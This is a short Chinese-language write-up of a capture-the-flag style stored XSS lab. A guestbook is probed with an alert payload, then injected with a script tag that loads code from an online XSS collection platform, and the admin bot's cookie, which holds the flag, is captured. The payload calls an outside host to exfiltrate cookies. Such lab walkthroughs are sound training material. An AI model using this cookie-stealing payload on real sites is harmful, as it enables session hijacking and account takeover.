Tips:
1、存儲型Xss
2、flag在cookie里,格式為zkz{..},xss bot 每10秒訪問一次頁面
3、自建Xss平台源碼:http://www.zkaq.org/?t/99.html
經過一番操作,尤里雖然進入到后台,竊竊自喜的他不滿足於此,作為黑闊他要挑戰曾經的自己,他要攻克之前失手的網站!
他重新瀏覽之前的網站,這時他突然發現了一個留言板功能。而留言板管理員是每天都會去查閱的。
尤里開始動手……
靶場地址
http://59.63.200.79:8004/Feedback.asp
留言框輸入
<script>alert('123')</script>
彈窗成功
發現留言框可以注入,存在注入點
在線xss平台 https://xss.pt/
注冊完成之后,創建項目
點擊下一步,完成創建!!!
找到這個鏈接
用上面的鏈接進行xss存儲型注入
在留言反饋的內容那里進行注入,注入代碼如下 <script src=https://xss.pt/F672></script>
注入完成之后,需要等待一段時間。大概10分鍾左右吧,就會收到網站的回復啦。
展開查看,發現flag
